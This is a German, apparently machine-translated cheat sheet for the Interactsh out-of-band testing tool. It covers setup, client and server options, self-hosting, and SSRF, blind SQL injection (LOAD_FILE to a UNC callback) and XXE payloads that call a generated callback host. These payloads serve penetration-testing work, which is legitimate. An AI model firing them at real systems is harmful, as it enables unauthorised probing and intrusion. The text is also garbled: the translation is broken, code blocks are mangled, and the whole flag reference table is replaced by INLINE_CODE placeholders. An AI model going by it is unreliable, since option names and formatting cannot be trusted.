Zum Inhalt

Interactsh OOB Interaction Gathering Cheat Sheet

Im Überblick

Interactsh ist ein Open-Source-Tool, das von Project Discovery entwickelt wurde, um Out-of-Band (OOB) Interaktionen zu erkennen. Es ist entworfen, um Schwachstellen zu identifizieren, die externe Interaktionen verursachen, wie Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, und andere Schwachstellen, die durch traditionelle Testmethoden nicht sofort sichtbar sein können.

Was Interactsh einzigartig macht, ist der umfassende Ansatz für OOB-Tests. Im Gegensatz zu anderen Tools, die sich auf bestimmte Protokolle konzentrieren, kann Interactsh Interaktionen über mehrere Protokolle erkennen, einschließlich DNS, HTTP(S), SMTP(S) und LDAP. Es besteht sowohl aus einer Serverkomponente, die diese Interaktionen erfasst und protokolliert, als auch aus einer Clientkomponente, die einzigartige Test-URLs generiert und überwacht für jede Interaktion mit diesen URLs.

Interactsh wird weit verbreitet in Sicherheitstests verwendet, um Schwachstellen zu identifizieren, die sonst unentdeckt werden könnten. Es ist besonders wertvoll für Bug bounty Jäger, Penetration Tester und Sicherheitsforscher, die die Existenz von Schwachstellen überprüfen müssen, die auf externe Interaktionen verlassen. Das Tool ist auch mit Nuclei integriert, einem anderen Project Discovery Tool, das eine automatisierte Schwachstellenerfassung mit OOB-Erkennungsfunktionen ermöglicht.

• Installation

Client Installation

Verwendung von Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Verwendung von Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Verwendung von Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Verwendung von PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Selbstbeheizt)

Verwendung von Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Verwendung von Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

oder Basisnutzung

Client Usage

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server-Nutzung (Self-Hosted)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Ausgabeoptionen

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent

Konfiguration des Clients

Grundkonfiguration

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtern

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Serverkonfiguration (Self-Hosted)

Domain Configuration

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Zertifikat Konfiguration

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

/ Fortgeschrittene Nutzung

Client erweiterte Funktionen

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "\\\\{\\\\{random\\\\}\\\\}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Erweiterte Funktionen

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration mit anderen Tools

Integration mit Nuclei

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration mit Benachrichtigung

# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack

Integration mit benutzerdefinierten Skripten

# Use Interactsh in a bash script
#!/bin/bash
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testen von Schwachstellen

Testing SSRF

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Blind SQL Injection testen

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testen XXE Injektion

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Fehlerbehebung

Häufige Fragen

ANHANG ** Keine Interaktionen festgestellt** 

   # Increase polling interval
   interactsh-client -poll-interval 10

   # Increase interaction timeout
   interactsh-client -interaction-timeout 120

   # Check if the target is behind a firewall
   # Try using different protocols (DNS, HTTP, SMTP)
   ```_

2. ** Anfragen**
```bash
   # Check if the server is reachable
   ping your-interactsh-server.com

   # Try a different server
   interactsh-client -server oast.pro

   # Check if your network allows outbound connections
   ```_

3. **Authentifizierungsfragen*
```bash
   # Verify token
   interactsh-client -server your-interactsh-server.com -token your-auth-token -v

   # Check if the server requires authentication
   ```_

4. ** Server Setup Issues*
```bash
   # Check DNS configuration
   dig ns your-domain.com

   # Verify that your domain's nameservers point to your server
   # Ensure that your server has the necessary ports open
   ```_

### Debugging

```bash
# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Ihr Selbst-Hosting Guide

DNS Konfiguration

Um Self-host Interactsh zu konfigurieren, müssen Sie die DNS-Einstellungen Ihrer Domain konfigurieren:

ANHANG Registrieren Sie eine Domain (z.B. your-domain.com) 2. Richten Sie NS-Datensätze für Ihre Domain ein, um auf Ihren Server zu zeigen: 

   your-domain.com. IN NS ns1.your-domain.com.
   your-domain.com. IN NS ns2.your-domain.com.
   ```_
3. Erstellen Sie eine Datensätze für Ihre Nameserver:
ns1.your-domain.com. IN A your-server-ip ns2.your-domain.com. IN A your-server-ip ```

Server Setup

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Konfiguration

Client Configuration File

Interactsh Client verwendet eine Konfigurationsdatei unter $HOME/.config/interactsh-client/config.yaml_. Sie können verschiedene Einstellungen in dieser Datei anpassen:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Konfigurationsdatei

Interactsh Server verwendet eine Konfigurationsdatei, die sich auf $HOME/.config/interactsh-server/config.yaml_ befindet. Sie können verschiedene Einstellungen in dieser Datei anpassen:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Umgebungsvariablen

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Referenz

Client Command Line Optionen

Flag Description
INLINE_CODE_39 Interactsh server to use
INLINE_CODE_40 Authentication token for the server
INLINE_CODE_41 Number of URLs to generate
INLINE_CODE_42 File to write output to
INLINE_CODE_43 Write output in JSON format
INLINE_CODE_44 Show verbose output
INLINE_CODE_45 Show debug information
INLINE_CODE_46 Polling interval in seconds
INLINE_CODE_47 Interaction timeout in seconds
INLINE_CODE_48 Enable persistent session
INLINE_CODE_49 Correlation ID for the session
INLINE_CODE_50 Filter interactions by type (dns, http, smtp, ldap)
INLINE_CODE_51 Filter interactions by IP
INLINE_CODE_52 Filter interactions by content
INLINE_CODE_53 Generate URL for testing
INLINE_CODE_54 Enable DNS callback only
INLINE_CODE_55 Enable HTTP callback only
INLINE_CODE_56 Enable SMTP callback only
INLINE_CODE_57 Enable LDAP callback only
INLINE_CODE_58 Custom payload template
INLINE_CODE_59 Show Interactsh client version
_
### Server Command Line Optionen
Flag Description
INLINE_CODE_60 Domain to use for the server
INLINE_CODE_61 IP address to listen on
INLINE_CODE_62 Enable wildcard domain
INLINE_CODE_63 Use Let's Encrypt for certificates
INLINE_CODE_64 Path to certificate file
INLINE_CODE_65 Path to key file
INLINE_CODE_66 Enable authentication
INLINE_CODE_67 Authentication token
INLINE_CODE_68 File containing authentication tokens
INLINE_CODE_69 Enable DNS service
INLINE_CODE_70 Enable HTTP service
INLINE_CODE_71 Enable SMTP service
INLINE_CODE_72 Enable LDAP service
INLINE_CODE_73 Disable DNS service
INLINE_CODE_74 Disable HTTP service
INLINE_CODE_75 Disable SMTP service
INLINE_CODE_76 Disable LDAP service
INLINE_CODE_77 Port for DNS service
INLINE_CODE_78 Port for HTTP service
INLINE_CODE_79 Port for HTTPS service
INLINE_CODE_80 Port for SMTP service
INLINE_CODE_81 Port for SMTPS service
INLINE_CODE_82 Port for LDAP service
INLINE_CODE_83 Enable metrics
INLINE_CODE_84 Show verbose output
INLINE_CODE_85 Show debug information
INLINE_CODE_86 Show Interactsh server version
_
### Unterstützte Interaktionsarten
Type Description
INLINE_CODE_87 DNS interactions
INLINE_CODE_88 HTTP/HTTPS interactions
INLINE_CODE_89 SMTP/SMTPS interactions
INLINE_CODE_90 LDAP interactions
_
Ressourcen

--

*Dieses Cheatsheet bietet eine umfassende Referenz für die Nutzung von Interactsh, von der Basis-Client- und Servernutzung bis hin zur erweiterten Konfiguration und Integration mit anderen Tools. Für die aktuellsten Informationen finden Sie immer die offizielle Dokumentation. *